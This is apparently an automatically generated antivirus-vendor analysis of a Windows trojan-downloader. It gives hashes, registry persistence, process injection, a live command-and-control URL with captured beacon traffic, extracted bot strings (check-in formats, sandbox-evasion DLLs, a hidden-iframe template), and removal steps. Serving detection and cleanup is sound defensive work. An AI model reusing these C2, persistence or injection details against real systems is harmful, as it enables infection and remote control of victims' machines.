Trojan.Win32.LoadMoney_edf2199994

by malwarelabrobot on March 2nd, 2015 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), TrojanLoadMoney.YR, TrojanDownloaderVundo.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: edf2199994d1a0ef2730391774b0574f
SHA1: b8da3f1c4df1b32e1a973fd2fe7b965a1ea19d9a
SHA256: 1b059fab27aa0661a8336e136fead7ba5115a5178e7f73f186240131683a44ef
SSDeep: 3072:dBWg0WcuUvpEZ/Tqqz47VJ0LrkGODhl/0UrVWCk/EBR8imt:XWg8AT7uJUrxK8N8BaV
Size: 153600 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2015-02-18 23:14:39
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

vbc.exe:504
%original file name%.exe:580

Mutexes

The following mutexes were created/opened:

ShimCacheMutex

File activity

The process vbc.exe:504 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\config\software (326 bytes)
%System%\config\SOFTWARE.LOG (1315 bytes)

The Trojan deletes the following file(s):

%WinDir%\1418334051\lsass (0 bytes)

The process %original file name%.exe:580 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe (153 bytes)

Registry activity

The process vbc.exe:504 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AA 15 D5 47 EE D9 7D 16 93 8E BB 89 56 D7 FA 6B"

The Trojan deletes the following value(s) in system registry:
The Trojan disables automatic startup of the application by deleting the following autorun value:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"*1418334051"

The process %original file name%.exe:580 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B7 95 A7 72 0B 01 21 FF C6 1D EC FB 88 94 38 44"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"VideoDriver" = "%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe"

Dropped PE files

MD5 File path
67f5238229333c061092f5a32e8c2ee1 c:\WINDOWS\1418334051\lsass

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name: dge
Product Version: 1.0.0.0
Legal Copyright: Copyright (c)
Legal Trademarks:
Original Filename: dge3.exe
Internal Name: dge3.exe
File Version: 1.0.0.0
File Description: dge
Comments:
Language: English

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 8192 150612 151040 5.42786 270f60416938301061a7d215a3dac394
.rsrc 163840 1296 1536 2.64395 4a52917006d4306a7fe177d678015a9f
.reloc 172032 12 512 0.070639 79737747aaf2d243a456ab7612074458

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://hacka4life.atwebpages.com/panel/gate.php 83.125.22.211
hxxp://hacka4life.atwebpages.com:80/panel/gate.php 83.125.22.211


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Trojan Generic - POST To gate.php with no referer
ET TROJAN Athena DDoS Bot Checkin

Traffic

POST /panel/gate.php HTTP/1.1
Host: hacka4life.atwebpages.com:80
Connection: close
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Content-Length: 436

a=dnNwbW5raGlmY2RheHVnYnl0cW9sd3JqZXo6d3Rxcm9saWpnZGVieXp1cG1raGN4ZmFzbnY=&b=gHR5dGU6drVfZWF0gHVqZDcyMTisMDRsMDd3NDU0MTEyZTJiODFiOGQ4MDZlNsE3MsY5NrZ8drFkOsQmgGJaX2kqpGyxZDcfgGJaX2ZqpGVvOsB8Yrkgb2V5dvcfgGJ1d3l6ZrFtd2V8&c=vvsspqqnnroolllijjggddeb
HTTP/1.1 200 OK
Date: Sun, 01 Mar 2015 03:10:50 GMT
Server: Apache
Content-Length: 60
Connection: close
Con


POST /panel/gate.php HTTP/1.1
Host: hacka4life.atwebpages.com:80
Connection: close
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Content-Length: 468

a=bGlmZ2RlYnl6d3Rxcm9tanh1c3BraGNuYXY6dnNwbW5raGlmY3pheHVxbGdkeXRvYmV3cmo=&b=pHR5eGU6h25pZXbvY3g1rWQ6MTE4YfA0YfA3NfQ1NDEgMWUiYTmgYTboODA2ZDYgNfI2OTZqpHBirXY6YWRzrW58YXJlrDt4ODZ8Z2VdZDtoZXNxnG9cpGNjeqVfOlF8h3M6V19YUHg2ZXI6nlEdMC44pG5vnDu0LlB8hqV3OlF8&c=ebcczzzwxuuurrsopmmmjjkh
HTTP/1.1 200 OK
Date: Sun, 01 Mar 2015 03:10:44 GMT
Server: Apache
Content-Length: 60
Connection: close
Content-Type: text/html
ZWJjY3p6end4dXV1cnJzb3BtbW1qamtoZonynWRHVwvohUZfUFRxn2ZBPT0K..


The Trojan connects to the servers at the following location(s):

vbc.exe_504:

.text
P`.data
.rdata
`@.eh_fram
.idata
tL<EtH<.tD
libgcj-13.dll
Mozilla/4.0 (compatible)
%s--%s
%s\B%i.tmp
http.
hXXp://
hXXps://
%y%m%d
%s:%i
%s\browser%li.html
<meta http-equiv="refresh" content="%i">
%s "%s"
Software\Microsoft\Windows NT\CurrentVersion\Windows\load
%s\%s.exe
Software\Microsoft\WindowsNT\CurrentVersion\SystemRestore
NoWindowsUpdate
%s@%s
%s\I%li.bat
%s\U%li.bat
%s\Google\Chrome\Application\chrome.exe
%s\Internet Explorer\iexplore.exe
%s\Opera\opera.exe
%s\Mozilla Firefox\firefox.exe
%s\Maxthon3\Bin\Maxthon.exe
Google Chrome
Opera
Firefox
chrome.exe
opera.exe
firefox.exe
iexplore.exe
Maxthon.exe
%s(%s)
|type:on_exec|uid:%s|priv:%s|arch:x%s|gend:%s|cores:%i|os:%s|ver:%s|net:%s|new:
|type:repeat|uid:%s|ram:%ld|bk_killed:%i|bk_files:%i|bk_keys:%i|busy:%s|
%s%s%i%s%s%s%s%s
%s:%s
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
|type:response|uid:%s|taskid:%i|return:%s|busy:%s|
autoruns.exe
explorer.exe
SbieDll.dll
snxhk.dll
dbghelp.dll
SOFTWARE\Microsoft\Windows NT\CurrentVersion
76487-640-1457236-23837
76487-644-3177037-23510
55274-640-2673064-23950
76497-640-6308873-23835
Windows Task Manager
%s %i %i
.hidden
filesearch.stop
%s@%s:%i
%s\System32\drivers\etc\protocol
%s\Microsoft.NET\Framework\
v4.0.30319
v2.0.50727
\explorer.exe
HTTP/1.
text/html, application/xml;q=0.9, application/xhtml xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
application/x-www-form-urlencoded
HTTP/1.
dnsapi.dll
%s & %s
Software\Microsoft\Windows\CurrentVersion\
\Microsoft\Windows
%s%s%s%s%i%s%s
:Zone.Identifier
%s\K%li.bat
document.write(unescape('%s'));
<iframe src="%s" width="0" height="0" frameborder="0"></iframe>
operator
operator
global constructors keyed to
global destructors keyed to
operator""
VirtualQuery failed for %d bytes at address %p
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation bit size %d.
fc_key
use_fc_key
hXXp://hacka4life.atwebpages.com/panel/gate.php
v1.0.8
panel/gate.php
hacka4life.atwebpages.com
%WinDir%
%Program Files%
%Documents and Settings%\All Users
%Documents and Settings%\%current user%
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
%Documents and Settings%\%current user%\Application Data
%Documents and Settings%\%current user%\Start Menu\Programs\Startup
%Documents and Settings%\All Users\Start Menu\Programs\Startup
%Program Files%\Internet Explorer\iexplore.exe
%Program Files%\Opera\opera.exe
%Program Files%\Mozilla Firefox\firefox.exe
%Program Files%\Maxthon3\Bin\Maxthon.exe
e.exe
ull)DvwJikPrQzhXXp://hacka4life.atwebpages.com/panel/gate.php80iYitJLxpCUv1.0.8
%WinDir%\Microsoft.NET\Framework\v2.0.50727\vbc.exe
%WinDir%\1418334051
%WinDir%\1418334051\lsass
RegCloseKey
RegCreateKeyExA
RegFlushKey
RegOpenKeyExA
GetProcessHeap
ShellExecuteA
InternetOpenUrlA
ADVAPI32.DLL
KERNEL32.DLL
msvcrt.dll
SHELL32.DLL
USER32.dll
WININET.DLL
Okernel32.dll
advapi32.dll
Aicmp.dll
surlmon.dll
gws2_32.dll
rpcrt4.dll



Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager): No processes have been created.
  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %System%\config\software (326 bytes)
    %System%\config\SOFTWARE.LOG (1315 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe (153 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "VideoDriver" = "%Documents and Settings%\%current user%\Local Settings\Temp\%original file name%.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
